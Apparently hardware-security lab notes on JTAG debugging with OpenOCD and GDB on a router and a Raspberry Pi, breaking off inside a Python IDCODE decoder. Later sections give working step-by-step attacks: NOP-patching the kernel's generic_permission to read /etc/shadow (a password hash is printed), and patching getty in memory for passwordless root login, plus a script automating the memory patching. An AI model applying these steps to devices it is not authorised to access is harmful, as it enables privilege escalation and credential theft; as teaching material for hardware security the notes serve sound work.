JTAG (IEEE 1149.1)

JTAG on an HDD

Finding the Pins

JTAG Pins Identification

Pin info:

  • TDI: Test Data In, serial input of the boundary-scan chain
  • TDO: Test Data Out, serial output of the boundary-scan chain
  • TMS: Test Mode Select, steers the TAP controller state machine
  • TCK: Test Clock, synchronizes the state machine (TMS and TDI are sampled on the rising edge)
  • TRST: optional asynchronous reset for the TAP controller's state machine; many targets do not wire it, in which case the TAP is reset by holding TMS high for five TCK cycles

Using Shikra

Pinout:

  • TCK: 1
  • TDI: 2
  • TDO: 3
  • TMS: 4
  • GND: 18

Shikra config:

>>> cat /usr/share/openocd/scripts/interface/shikra.cfg
#shikra.cfg
adapter driver ftdi
ftdi_vid_pid 0x0403 0x6014
ftdi_layout_init 0x0c08 0x0f1b
adapter speed 2000
#end shikra.cfg

OpenOCD Raspberry Pi 4 config:

# Raspberry Pi 4
telnet_port 4444
gdb_port 3333

transport select jtag
adapter speed 125
jtag_ntrst_delay 500

reset_config trst_only trst_open_drain
gdb_breakpoint_override hard

if { [info exists CHIPNAME] } {
    set _CHIPNAME $CHIPNAME
} else {
    set _CHIPNAME bcm2711
}

if { [info exists DAP_TAPID] } {
    set _DAP_TAPID $DAP_TAPID
} else {
    set _DAP_TAPID 0x4ba00477
}

jtag newtap $_CHIPNAME tap -irlen 4 -ircapture 0x1 -irmask 0xf -expected-id $_DAP_TAPID -enable
dap create $_CHIPNAME.dap -chain-position $_CHIPNAME.tap

set _TARGETNAME $_CHIPNAME.a72
set _CTINAME $_CHIPNAME.cti
set DBGBASE {0x80410000 0x80510000 0x80610000 0x80710000}
set CTIBASE {0x80420000 0x80520000 0x80620000 0x80720000}
set _cores 4

for { set _core 0 } { $_core < $_cores } { incr _core } {
    cti create $_CTINAME.$_core -dap $_CHIPNAME.dap -ap-num 0 \
        -baseaddr [lindex $CTIBASE $_core]

    target create $_TARGETNAME.$_core aarch64 \
        -dap $_CHIPNAME.dap -coreid $_core \
        -dbgbase [lindex $DBGBASE $_core] -cti $_CTINAME.$_core

    $_TARGETNAME.$_core configure -event gdb-attach { halt }
}

# Uncomment below to use SMP
#target smp $_TARGETNAME.0 $_TARGETNAME.1 $_TARGETNAME.2 $_TARGETNAME.3
#targets $_TARGETNAME.0

Use OpenOCD with Shikra:

>>> sudo openocd -f /usr/share/openocd/scripts/interface/shikra.cfg -f /usr/share/openocd/scripts/target/at91sam7x512.cfg
Open On-Chip Debugger 0.10.0
Licensed under GNU GPL v2
For bug reports, read
    http://openocd.org/doc/doxygen/bugs.html
adapter speed: 2000 kHz
srst_only srst_pulls_trst srst_gates_jtag srst_open_drain connect_deassert_srst
Info : auto-selecting first available session transport "jtag". To override use 'transport select <transport>'.
Info : clock speed 2000 kHz
Error: JTAG scan chain interrogation failed: all ones
Error: Check JTAG interface, timings, target power, etc.
Error: Trying to use configured scan chain anyway...
Error: sam7x512.cpu: IR capture error; saw 0x0f not 0x01
Warn : Bypassing JTAG setup events due to errors
Info : Embedded ICE version 15
Error: unknown EmbeddedICE version (comms ctrl: 0xffffffff)
Info : sam7x512.cpu: hardware has 2 breakpoint/watchpoint units
Warn : ThumbEE -- incomplete support
Info : accepting 'telnet' connection on tcp/4444

"All ones" means TDO stayed high for the whole interrogation: no TAP answered. Before trusting anything the target config prints after that point (the EmbeddedICE lines here are OpenOCD guessing against a chain that is not there), check the pin mapping (TDI and TDO swapped is the classic mistake), that the target is powered and shares ground with the adapter, and that it is not being held in reset.

Using Tigard

Tigard config:

>>> cat /usr/share/openocd/scripts/interface/tigard.cfg
interface ftdi
ftdi_vid_pid 0x0403 0x6010
ftdi_channel 1
adapter speed 2000
ftdi_layout_init 0x0078 0x017b
ftdi_layout_signal nTRST -ndata 0x0010 -noe 0x0040
ftdi_layout_signal nSRST -ndata 0x0020 -noe 0x0040
transport select jtag

"interface ftdi" is the pre-0.11 spelling of "adapter driver ftdi" used in the Shikra config above; OpenOCD 0.11 still accepts it but prints a deprecation warning.

OCD Router Experiment

Running OpenOCD on the router:

>>> openocd -f tigard-jtag.cfg -f mt7620n.cfg
Open On-Chip Debugger 0.11.0
Licensed under GNU GPL v2
For bug reports, read
    http://openocd.org/doc/doxygen/bugs.html
jtag
mt7620.cpu
Info : Listening on port 6666 for tcl connections
Info : Listening on port 4444 for telnet connections
Info : clock speed 2000 kHz
Info : JTAG tap: mt7620.cpu tap/device found: 0x1635224f (mfg: 0x127 (MIPS Technologies), part: 0x6352, ver: 0x1)
Info : starting gdb server for mt7620.cpu on 3333
Info : Listening on port 3333 for gdb connections

Connect to OpenOCD on the router:

>>> telnet localhost 4444
Trying ::1...
telnet: connect to address ::1: Connection refused
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
Open On-Chip Debugger
> halt
MIPS32 with MIPS16 support implemented
target halted in MIPS32 mode due to debug-request, pc: 0x80011090
> step
target halted in MIPS32 mode due to single-step, pc: 0x80011094
> reg
===== mips32 registers
(0) r0 (/32): 0x00000000
(1) r1 (/32): 0x00000000
(2) r2 (/32): 0x1100a401
(3) r3 (/32): 0x00000000
(4) r4 (/32): 0x00000000
(5) r5 (/32): 0x01000000
(6) r6 (/32): 0x1100a400
(7) r7 (/32): 0xffff00fe
(8) r8 (/32): 0x802f9fe0
(9) r9 (/32): 0x0000a400
(10) r10 (/32): 0x000f4240
(11) r11 (/32): 0x00000000
(12) r12 (/32): 0x00000035
(13) r13 (/32): 0x777eb3a0
(14) r14 (/32): 0x000003e8
(15) r15 (/32): 0x7789e000
(16) r16 (/32): 0x80300000
(17) r17 (/32): 0x00000001
(18) r18 (/32): 0x802aa744
(19) r19 (/32): 0x00000001
(20) r20 (/32): 0x83fe0000
(21) r21 (/32): 0x00000000
(22) r22 (/32): 0x83fe0000
(23) r23 (/32): 0x00000000
(24) r24 (/32): 0x000003e8
(25) r25 (/32): 0x8001107c
(26) r26 (/32): 0x802f9eb8
(27) r27 (/32): 0x802f9eb8
(28) r28 (/32): 0x802f8000
(29) r29 (/32): 0x802f9eb8
(30) r30 (/32): 0x83fe0000
(31) r31 (/32): 0x80043540
(32) status (/32): 0x1100a401
(33) lo (/32): 0x402da580
(34) hi (/32): 0x00000035
(35) badvaddr (/32): 0x777e3468
(36) cause (/32): 0xd0808000
(37) pc (/32): 0x80043500
(38) f0 (/32): 0x00000000
(39) f1 (/32): 0x00000000
(40) f2 (/32): 0x00000000
(41) f3 (/32): 0x00000000
(42) f4 (/32): 0x00000000
(43) f5 (/32): 0x00000000
(44) f6 (/32): 0x00000000
(45) f7 (/32): 0x00000000
(46) f8 (/32): 0x00000000
(47) f9 (/32): 0x00000000
(48) f10 (/32): 0x00000000
(49) f11 (/32): 0x00000000
(50) f12 (/32): 0x00000000
(51) f13 (/32): 0x00000000
(52) f14 (/32): 0x00000000
(53) f15 (/32): 0x00000000
(54) f16 (/32): 0x00000000
(55) f17 (/32): 0x00000000
(56) f18 (/32): 0x00000000
(57) f19 (/32): 0x00000000
(58) f20 (/32): 0x00000000
(59) f21 (/32): 0x00000000
(60) f22 (/32): 0x00000000
(61) f23 (/32): 0x00000000
(62) f24 (/32): 0x00000000
(63) f25 (/32): 0x00000000
(64) f26 (/32): 0x00000000
(65) f27 (/32): 0x00000000
(66) f28 (/32): 0x00000000
(67) f29 (/32): 0x00000000
(68) f30 (/32): 0x00000000
(69) f31 (/32): 0x00000000
(70) fcsr (/32): 0x00000000
(71) fir (/32): 0x00000000

Read memory from OpenOCD:

>>> telnet localhost 4444
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
Open On-Chip Debugger
> halt
> mem2arrat tcl_varable_name 32 0xd0000000 0x1000
invalid command name "mem2arrat"
> mem2array tcl_varable_name 32 0xd0000000 0x1000
mem2array: Read @ 0xd0000000, w=4, cnt=1024, failed
> mem2array tcl_varable_name 32 0x00000000 0x1000
mem2array: Read @ 0x00000000, w=4, cnt=1024, failed
> mem2array tcl_varable_name 32 0x00000000 0x100
mem2array: Read @ 0x00000000, w=4, cnt=256, failed
> dump_image mydump.bin 0x80000000 0x2000000

The failed reads are what the MIPS32 memory map predicts: 0x00000000 (useg) and 0xd0000000 (kseg2) are TLB-mapped regions, so there is nothing for the debugger to read unless a valid mapping happens to be loaded. kseg0 (0x80000000-0x9fffffff) is an unmapped, cached window onto the first 512 MiB of physical memory, which is why the dump_image of 32 MiB from 0x80000000 works and is where the kernel lives.

GDB Router Experiment

$ gdb-multiarch
GNU gdb (Debian 10.1-1.7) 10.1.90.20210103-git
Copyright (C) 2021 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.
Type "show copying" and "show warranty" for details.
This GDB was configured as "x86_64-linux-gnu".
Type "show configuration" for configuration details.
For bug reporting instructions, please see:
<https://www.gnu.org/software/gdb/bugs/>.
Find the GDB manual and other documentation resources online at:
    <http://www.gnu.org/software/gdb/documentation/>.

For help, type "help".
Type "apropos word" to search for commands related to "word".
(gdb) set architecture mips
The target architecture is set to "mips".
(gdb) target extended-remote localhost:3333
Remote debugging using localhost:3333
warning: No executable has been specified and target does not support
determining executable automatically.  Try using the "file" command.
0xff200208 in ?? ()
(gdb) res
(gdb) i r
          zero       at       v0       v1       a0       a1       a2       a3
 R0   00000000 00000001 ec4e4000 000000c0 00026cbb 0002ee00 00000000 0000039b
            t0       t1       t2       t3       t4       t5       t6       t7
 R8   0000002e 676e6974 206e6920 65732033 00000000 777eb3a0 00000000 64692065
            s0       s1       s2       s3       s4       s5       s6       s7
 R16  00000960 00000001 00000a28 80340000 00000047 80340000 80340000 000003e8
            t8       t9       k0       k1       gp       sp       s8       ra
 R24  00000003 8017ff5c 802f9c18 802f9c18 802f8000 802f9c80 83fe0000 8002407c
        status       lo       hi badvaddr    cause       pc
      1100a400 11aa0000 0000039b ff2001fc 50808000 8013e560
          fcsr      fir
      00000000 00000000
(gdb) cont
Continuing.
^C
Program received signal SIGINT, Interrupt.
0x8013e560 in ?? (warning: GDB can't find the start of the function at 0x8013e560.

    GDB is unable to find the start of the function at 0x8013e560
and thus can't determine the size of that function's stack frame.
This means that GDB may be unable to access that stack frame, or
the frames below it.
    This problem is most likely caused by an invalid program counter or
stack pointer.
    However, if you think GDB should simply search farther back
from 0x8013e560 for code which looks like the beginning of a
function, you can increase the range of the search using the `set
heuristic-fence-post' command.
)
(gdb) x/10w $pc
0x8013e560:    343998463    612696063    65011720    0
0x8013e570:    1006796848   -1941722000  1006764038  876776892
0x8013e580:    6422553      4114
(gdb) x/10i $pc
=> 0x8013e560:    bnez    a0,0x8013e560
   0x8013e564:    addiu   a0,a0,-1
   0x8013e568:    jr      ra
   0x8013e56c:    nop
   0x8013e570:    lui     v0,0x8030
   0x8013e574:    lw      v1,-21392(v0)
   0x8013e578:    lui     v0,0x6
   0x8013e57c:    ori     v0,v0,0x8dbc
   0x8013e580:    multu   v1,v0
   0x8013e584:    mflo    v0

Privilege Escalation

Finding the kernel boot args:

GDB's find takes a start address and an end address (or a length) and a string; the addresses need the 0x prefix or GDB treats them as symbol names. Searching the whole 32-bit space fails at the first unreadable region, so restrict it to the kseg0 range that dump_image could read above:

(gdb) find 0x80000000, 0x81ffffff, "console"

Patching boot args:

telnet localhost 4444
# Halt the CPU
> halt
# Read memory at the address
> mdw 0x8020dcc8
# Write data to memory
> mww 0x8020dcc8 0xffffffff
# Read memory at the address
> mdw 0x8020dcc8
# Create a watchpoint and resume CPU execution
> wp 0x8020dcc8 4; resume
# When the watchpoint is triggered, remove it, step to the next
# instruction so that the data is actually written, and show the
# written data
> rwp 0x8020dcc8; step; mdw 0x8020dcc8
# Write the new boot args to the memory address
> mww 0x8020dcc8 0x324d2031
# Check that it was written correctly
> mdw 0x8020dcc8
# Resume the CPU
> resume

Patching Kernel Memory MIPS

We patch kernel memory so that generic_permission, the function that checks whether a user may read or write a file, never returns the access error -EACCES (-13). This lets an unprivileged user operate on files as if they were root, without changing any permissions.

Find the generic_permission function:

user@OpenWrt:~$ cat /proc/kallsyms | grep generic_permission
800a8a38 T generic_permission

GDB memory info:

(gdb) x/200i 0x800a8a38
[...]
   0x800a8ad4:    li      v0,-13
   0x800a8ad8:    andi    s2,s2,0x1
   0x800a8adc:    beqz    s2,0x800a8b00
   0x800a8ae0:    andi    v0,v0,0x49
   0x800a8ae4:    bnez    v0,0x800a8b04
   0x800a8ae8:    move    a0,s0
   0x800a8aec:    li      v0,4
[...]
   0x800a8b2c:    li      v0,-13
   0x800a8b30:    lw      ra,36(sp)
   0x800a8b34:    lw      s3,32(sp)
   0x800a8b38:    lw      s2,28(sp)
   0x800a8b3c:    lw      s1,24(sp)
   0x800a8b40:    lw      s0,20(sp)
   0x800a8b44:    jr      ra

Break on the EACCES (-13) load instructions:

# 0x800a8ad4: li v0,-13
# 0x800a8afc: li v0,-13
# 0x800a8b2c: li v0,-13
(gdb) break *0x800a8ad4
warning: Breakpoint address adjusted from 0xffffffff800a8ad4 to 0xffffffff800a8ad0.
Breakpoint 2 at 0x800a8ad0
(gdb) break *0x800a8afc
warning: Breakpoint address adjusted from 0xffffffff800a8afc to 0xffffffff800a8af8.
Breakpoint 3 at 0x800a8af8
(gdb) break *0x800a8b2c
Breakpoint 4 at 0x800a8b2c

The two "adjusted" warnings tell you that those li instructions sit in branch delay slots: GDB will not place a breakpoint in a delay slot and moves it back onto the branch, so the breakpoint still fires before the li runs. Replacing a delay-slot instruction with a NOP is safe because the branch itself is untouched.

Trigger the EACCES error:

user@OpenWrt:~$ cat /etc/shadow

Modify the generic_permission function memory:

telnet localhost 4444
Trying ::1...
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
Open On-Chip Debugger
accepting 'gdb' connection on tcp/3333
MIPS32 with MIPS16 support implemented
target halted in MIPS32 mode due to debug-request, pc: 0x80011090
# 0x00000000 is NOP in MIPS (sll zero,zero,0)
> mww 0x800a8ad4 0x00000000
> mww 0x800a8b2c 0x00000000

Check with GDB:

(gdb) x/5i 0x800a8ad4
   0x800a8ad4:    nop
   0x800a8ad8:    andi    s2,s2,0x1
   0x800a8adc:    beqz    s2,0x800a8b00
   0x800a8ae0:    andi    v0,v0,0x49
   0x800a8ae4:    bnez    v0,0x800a8b04
   0x800a8ae8:    move    a0,s0
(gdb) x/5i 0x800a8b2c
   0x800a8b2c:    nop
   0x800a8b30:    lw      ra,36(sp)
   0x800a8b34:    lw      s3,32(sp)
   0x800a8b38:    lw      s2,28(sp)
   0x800a8b3c:    lw      s1,24(sp)

Patching Kernel Memory ARM

Same idea as the MIPS case above: patch generic_permission so that it never returns -EACCES (-13) and an unprivileged user can read and write files as if root. Only the instruction encoding and the way the error value is loaded differ on ARM.

Find the generic_permission function:

pi@raspberrypi:~$ sudo cat /proc/kallsyms | grep generic_permission
c0136dd4 T generic_permission
c0712514 R __ksymtab_generic_permission
c071dc94 r __kcrctab_generic_permission
c0729124 r __kstrtab_generic_permission

Use GDB to find the -13 (mvn r0, #12 loads ~12 = 0xfffffff3 = -13):

$ gdb-multiarch
GNU gdb (Debian 10.1-1.7) 10.1.90.20210103-git
Copyright (C) 2021 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.
Type "show copying" and "show warranty" for details.
This GDB was configured as "x86_64-linux-gnu".
Type "show configuration" for configuration details.
For bug reporting instructions, please see:
<https://www.gnu.org/software/gdb/bugs/>.
Find the GDB manual and other documentation resources online at:
    <http://www.gnu.org/software/gdb/documentation/>.

For help, type "help".
Type "apropos word" to search for commands related to "word".
(gdb) set architecture armv7
The target architecture is set to "armv7".
(gdb) target extended-remote localhost:3333
Remote debugging using localhost:3333
(gdb) x/200i 0xc0136dd4
   0xc0136dd4:    mov     r12, sp
   0xc0136dd8:    push    {r3, r4, r5, r6, r7, r8, r11, r12, lr, pc}
   0xc0136ddc:    sub     r11, r12, #4
   0xc0136de0:    push    {lr}            ; (str lr, [sp, #-4]!)
   0xc0136de4:    ldmfd   sp!, {lr}
   0xc0136de8:    mov     r3, sp
   0xc0136dec:    bic     r3, r3, #8128   ; 0x1fc0
   0xc0136df0:    bic     r3, r3, #63     ; 0x3f
[...]
   0xc0136eb0:    mvn     r0, #12
   0xc0136eb4:    ldm     sp, {r3, r4, r5, r6, r7, r8, r11, sp, pc}

Set the breakpoints:

(gdb) break *0xC0136EB0
Breakpoint 9 at 0xc0136eb0
(gdb) c
Continuing.

Breakpoint 9, 0xc0136eb0 in ?? ()
(gdb) info reg $r0
r0             0x0                 0
(gdb) x/10i $pc
=> 0xc0136eb0:    mvn     r0, #12
   0xc0136eb4:    ldm     sp, {r3, r4, r5, r6, r7, r8, r11, sp, pc}
   0xc0136eb8:    mov     r0, r5
   0xc0136ebc:    mov     r1, #1
   0xc0136ec0:    bl      0xc00296f4
   0xc0136ec4:    cmp     r0, #0
   0xc0136ec8:    bne     0xc0136e28
   0xc0136ecc:    tst     r6, #2
   0xc0136ed0:    beq     0xc0136e9c
   0xc0136ed4:    b       0xc0136eb0
(gdb) nexti
0xc0136eb4 in ?? ()
(gdb) x/10i $pc
=> 0xc0136eb4:    ldm     sp, {r3, r4, r5, r6, r7, r8, r11, sp, pc}
   0xc0136eb8:    mov     r0, r5
   0xc0136ebc:    mov     r1, #1
   0xc0136ec0:    bl      0xc00296f4
   0xc0136ec4:    cmp     r0, #0
   0xc0136ec8:    bne     0xc0136e28
   0xc0136ecc:    tst     r6, #2
   0xc0136ed0:    beq     0xc0136e9c
   0xc0136ed4:    b       0xc0136eb0
   0xc0136ed8:    tst     r6, #128        ; 0x80
(gdb) info reg $r0
r0             0xfffffff3          4294967283
(gdb)

Test the register change:

(gdb) set $r0=0
(gdb) info reg $r0
r0             0x0                 0

Trigger the EACCES error:

pi@raspberrypi:~$ cat /etc/shadow

Modify the generic_permission function memory:

telnet localhost 4444
Trying ::1...
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
Open On-Chip Debugger
# ARM NOP is 0xe320f000; stored little-endian the bytes are 00 f0 20 e3
# There is a bug with writing more than one byte at a time here, so write byte by byte
> mwb 0xc0136eb0 0x00
> mwb 0xc0136eb1 0xf0
> mwb 0xc0136eb2 0x20
> mwb 0xc0136eb3 0xe3
> mdw 0xc0136eb0
0xc0136eb0: e320f000

Check with GDB:

(gdb) x/10i 0xc0136eb0
   0xc0136eb0:    nop     {0}
   0xc0136eb4:    ldm     sp, {r3, r4, r5, r6, r7, r8, r11, sp, pc}
   0xc0136eb8:    mov     r0, r5
   0xc0136ebc:    mov     r1, #1
   0xc0136ec0:    bl      0xc00296f4
   0xc0136ec4:    cmp     r0, #0
   0xc0136ec8:    bne     0xc0136e28
   0xc0136ecc:    tst     r6, #2
   0xc0136ed0:    beq     0xc0136e9c
   0xc0136ed4:    b       0xc0136eb0

Do the test (first before the patch, then after it):

pi@raspberrypi:~$ cat /etc/shadow
cat: /etc/shadow: Permission denied
pi@raspberrypi:~$ cat /etc/shadow
root:*:16948:0:99999:7:::
daemon:*:16948:0:99999:7:::
bin:*:16948:0:99999:7:::
sys:*:16948:0:99999:7:::
sync:*:16948:0:99999:7:::
games:*:16948:0:99999:7:::
man:*:16948:0:99999:7:::
lp:*:16948:0:99999:7:::
mail:*:16948:0:99999:7:::
news:*:16948:0:99999:7:::
uucp:*:16948:0:99999:7:::
proxy:*:16948:0:99999:7:::
www-data:*:16948:0:99999:7:::
backup:*:16948:0:99999:7:::
list:*:16948:0:99999:7:::
irc:*:16948:0:99999:7:::
gnats:*:16948:0:99999:7:::
nobody:*:16948:0:99999:7:::
systemd-timesync:*:16948:0:99999:7:::
systemd-network:*:16948:0:99999:7:::
systemd-resolve:*:16948:0:99999:7:::
systemd-bus-proxy:*:16948:0:99999:7:::
pi:$6$X8NLlS0p$2S1FocpEf70CQkDf/fo6DjBo6/2qAQh4hi1ZnaQ8xLZMNEAOf/VAoiuGOspW/v6CpNvJr.SL5m6EM6yPwQIgq/:16948:0:99999:7:::
messagebus:*:16948:0:99999:7:::
avahi:*:16948:0:99999:7:::
ntp:*:16948:0:99999:7:::
sshd:*:16948:0:99999:7:::
statd:*:16948:0:99999:7:::
lightdm:*:16948:0:99999:7:::
pulse:*:16948:0:99999:7:::
rtkit:*:16948:0:99999:7:::

Patching Program Memory ARM

We patch the running getty so that it executes "login -f username" instead of "login -- username". The -f flag tells login that the user is already authenticated, so the password check is skipped: anyone sitting at the login prompt gets a shell as whatever user name they type, root included.

Find the file offset of the "--" string (it sits right after the "-f" string in getty's read-only data):

pi@raspberrypi:~$ xxd /sbin/getty | grep "\-\-"
[...]
0006b40: 2d66 0000 2d2d 0000 2573 3a20 6361 6e27  -f..--..%s: can'

Using my find-and-replace script:

$ python ocd_mem_find_replace.py -f "2d66 0000 2d2d 0000" -r "2d66 0000 2d66 0000" -o 0x6b40 -s 0xd0000000
{5: '0x66'}
Starting Scanning Range 0xd0000000 - 0xd1000000
Starting Scanning Range 0xd1000000 - 0xd2000000
Starting Scanning Range 0xd2000000 - 0xd3000000
Starting Scanning Range 0xd3000000 - 0xd4000000
Starting Scanning Range 0xd4000000 - 0xd5000000
Starting Scanning Range 0xd5000000 - 0xd6000000
Starting Scanning Range 0xd6000000 - 0xd7000000
Found Partial Match at 0xd6cf9b40: 0000662d
Found Partial Match at 0xd6cf9b44: 00002d2d
Found Match at 0xd6cf9b40: ['0000662d', '00002d2d']
Patching Address 0xd6cf9b40: 00002d2d -> 2d66 0000 2d66 0000
mwb phys 0xD6CF9B45 0x66
Resuming the Process
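The ocd_mem_find_replace.py script itself is not on the page. What follows is an added example (my code, not the author's script and not part of OpenOCD) that reimplements what its output shows: read memory through OpenOCD, put the bytes back in memory order (mdw prints words in target byte order, which is why "-f\0\0--\0\0" appears as 0000662d 00002d2d on the little-endian Pi), find the pattern, and write back only the bytes that differ with mwb phys. It assumes OpenOCD's Tcl RPC on port 6666 and the capture, mdw phys and mwb phys commands, and only handles same-length replacements so nothing shifts. The cmdline_words helper also covers the boot-args mww write from the Privilege Escalation section, assuming the big-endian byte order of the MT7620 (the ramips OpenWrt target), where "2M 1" packs to 0x324d2031 as on the page. The SAMPLE_MDW line is constructed to match the getty bytes found above.

```python
"""Find a byte pattern in memory read through OpenOCD and patch it in place.

mdw prints 32-bit words in the target's byte order. On the little-endian
Raspberry Pi the bytes 2d 66 00 00 2d 2d 00 00 ("-f\\0\\0--\\0\\0") show up
as "0000662d 00002d2d", so the bytes must be reassembled before searching.
"""
import re
import socket
from typing import Dict, List, Tuple

MDW_LINE = re.compile(r"^(0x[0-9a-fA-F]+):((?:\s+[0-9a-fA-F]{8})+)\s*$")

# Constructed sample of what "mdw phys 0xd6cf9b40 2" prints for getty's
# "-f\0\0--\0\0" strings (same address as in the script output above).
SAMPLE_MDW = "0xd6cf9b40: 0000662d 00002d2d"


def parse_mdw(text: str, big_endian: bool = False) -> Dict[int, bytes]:
    """Turn mdw output into {address_of_line: bytes} in real memory order."""
    order = "big" if big_endian else "little"
    out: Dict[int, bytes] = {}
    for line in text.splitlines():
        m = MDW_LINE.match(line.strip())
        if m:
            words = m.group(2).split()
            out[int(m.group(1), 16)] = b"".join(int(w, 16).to_bytes(4, order) for w in words)
    return out


def flatten(chunks: Dict[int, bytes]) -> Tuple[int, bytes]:
    """Join contiguous mdw lines into one (base, buffer); a hole is an error."""
    base, buf = None, b""
    for addr in sorted(chunks):
        if base is None:
            base = addr
        elif addr != base + len(buf):
            raise ValueError(f"gap in dump before 0x{addr:08x}")
        buf += chunks[addr]
    if base is None:
        raise ValueError("no mdw lines found (read failed?)")
    return base, buf


def find_all(base: int, buf: bytes, needle: bytes) -> List[int]:
    """Every address in buf where needle starts (overlapping hits included)."""
    hits, i = [], buf.find(needle)
    while i != -1:
        hits.append(base + i)
        i = buf.find(needle, i + 1)
    return hits


def patch_commands(addr: int, old: bytes, new: bytes, phys: bool = True) -> List[str]:
    """One mwb per byte that differs; same length only, so nothing shifts."""
    if len(old) != len(new):
        raise ValueError("replacement must have the same length as the pattern")
    space = "phys " if phys else ""
    return [f"mwb {space}0x{addr + i:08x} 0x{b:02x}"
            for i, (a, b) in enumerate(zip(old, new)) if a != b]


def cmdline_words(text: str, big_endian: bool) -> List[int]:
    """NUL-terminate, pad to 4 bytes and pack a string into words for mww."""
    data = text.encode() + b"\0"
    data += b"\0" * (-len(data) % 4)
    order = "big" if big_endian else "little"
    return [int.from_bytes(data[i:i + 4], order) for i in range(0, len(data), 4)]


class OpenOcdRpc:
    """Minimal client for OpenOCD's Tcl RPC: port 6666, messages end in 0x1a."""

    def __init__(self, host: str = "localhost", port: int = 6666) -> None:
        self.sock = socket.create_connection((host, port))

    def cmd(self, command: str) -> str:
        self.sock.sendall(command.encode() + b"\x1a")
        data = b""
        while not data.endswith(b"\x1a"):
            data += self.sock.recv(4096)
        return data[:-1].decode(errors="replace")


def scan_and_patch(rpc: OpenOcdRpc, start: int, size: int, old: bytes, new: bytes,
                   big_endian: bool = False, chunk: int = 0x1000) -> List[int]:
    """Halt, read [start, start+size) with mdw phys in chunks, patch hits, resume.
    A pattern straddling a chunk boundary is missed: keep chunk >> len(old)."""
    rpc.cmd("halt")
    patched: List[int] = []
    for addr in range(start, start + size, chunk):
        dump = rpc.cmd(f'capture "mdw phys 0x{addr:08x} {chunk // 4}"')
        try:
            base, buf = flatten(parse_mdw(dump, big_endian))
        except ValueError:
            continue  # unreadable window, skip it
        for hit in find_all(base, buf, old):
            for c in patch_commands(hit, old, new):
                rpc.cmd(c)
            patched.append(hit)
    rpc.cmd("resume")
    return patched


if __name__ == "__main__":
    base, buf = flatten(parse_mdw(SAMPLE_MDW))
    for hit in find_all(base, buf, b"-f\0\0--\0\0"):
        print("\n".join(patch_commands(hit, b"-f\0\0--\0\0", b"-f\0\0-f\0\0")))
    print(["0x%08x" % w for w in cmdline_words("2M 1", big_endian=True)])
```

Against a live target the call is scan_and_patch(OpenOcdRpc(), 0xd0000000, 0x7000000, b"-f\0\0--\0\0", b"-f\0\0-f\0\0"). Because the hit is the page-cache copy of getty's read-only data, the change sticks for every getty started afterwards until the page is evicted or the box reboots; also search for the full 8-byte pattern rather than just "--", or you will patch unrelated strings.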

Login without a password:

Raspbian GNU/Linux 8 raspberrypi ttyAMA0

raspberrypi login: root
Last login: Sun Jul 24 15:29:32 UTC 2016 on ttyAMA0
Linux raspberrypi 4.4.13+ #894 Mon Jun 13 12:43:26 BST 2016 armv6l

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
root@raspberrypi:~#

Using OpenOCD

Finding the number of TAPs (start OpenOCD with only the interface config and let it auto-probe):

>>> sudo openocd -f /usr/share/openocd/scripts/interface/ftdi/tigard-jtag.cfg
Open On-Chip Debugger 0.11.0-rc1+dev-00015-gd4bf20756-dirty (2021-01-13-00:58)
Licensed under GNU GPL v2
For bug reports, read
    http://openocd.org/doc/doxygen/bugs.html
jtag
Info : Listening on port 6666 for tcl connections
Info : Listening on port 4444 for telnet connections
Info : clock speed 2000 kHz
Warn : There are no enabled taps. AUTO PROBING MIGHT NOT WORK!!
Info : JTAG tap: auto0.tap tap/device found: 0x4ba00477 (mfg: 0x23b (ARM Ltd), part: 0xba00, ver: 0x4)
Warn : AUTO auto0.tap - use "jtag newtap auto0 tap -irlen 4 -expected-id 0x4ba00477"
Warn : gdb services need one or more targets defined
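The IDCODE values OpenOCD and ftjrev print on this page (0x4ba00477, 0x1635224f, 0x2295C093) all follow the IEEE 1149.1 layout: bit 0 is always 1, bits 1-11 are the JEP106 manufacturer code, bits 12-27 the part number and bits 28-31 the version. As an added example (my code, not from the page, OpenOCD or ftjrev), the following Python decodes such values, tells the two classic failure readings apart ("all ones" when TDO is stuck high, a clear bit 0 when the device is in BYPASS or TDO is stuck low) and walks a raw scan of a multi-device chain the way a chain interrogation does. The JEP106 table is a three-entry subset; the end-of-chain rule assumes TDI is held high while shifting past the last device.

```python
"""Decode IEEE 1149.1 IDCODE words like the ones OpenOCD and ftjrev print.

Layout of the 32-bit IDCODE (shifted out of TDO least-significant bit first):
  bit 0      : always 1. A TAP without an IDCODE register puts its 1-bit
               BYPASS register on the chain instead, which shifts out a 0.
  bits 1-11  : 11-bit JEP106 manufacturer code; bits 8-11 are the "bank"
               (number of 0x7F continuation bytes), bits 1-7 the 7-bit id.
  bits 12-27 : 16-bit part number.
  bits 28-31 : 4-bit version.
"""
import re
from dataclasses import dataclass
from typing import List, Optional

# Subset of the JEDEC JEP106 manufacturer table, keyed by (bank, id).
# Only the vendors that show up in the logs on this page are listed.
JEP106 = {
    (4, 0x3B): "ARM Ltd",
    (2, 0x27): "MIPS Technologies",
    (0, 0x49): "Xilinx",
}

ALL_ONES = 0xFFFFFFFF


def classify(raw: int) -> str:
    """Distinguish a real IDCODE from the two classic failure patterns."""
    raw &= ALL_ONES
    if raw == ALL_ONES:
        return "all-ones"   # TDO stuck high: wiring, power, or TDI/TDO swapped
    if raw & 1 == 0:
        return "bypass"     # bit 0 clear: no IDCODE register, or TDO stuck low
    return "idcode"


@dataclass(frozen=True)
class IdCode:
    raw: int
    manufacturer: int   # 11-bit JEP106 code as OpenOCD prints it (e.g. 0x23b)
    part: int
    version: int

    @property
    def manufacturer_name(self) -> str:
        bank, ident = self.manufacturer >> 7, self.manufacturer & 0x7F
        return JEP106.get((bank, ident), f"unknown (JEP106 bank {bank}, id 0x{ident:02x})")

    def __str__(self) -> str:
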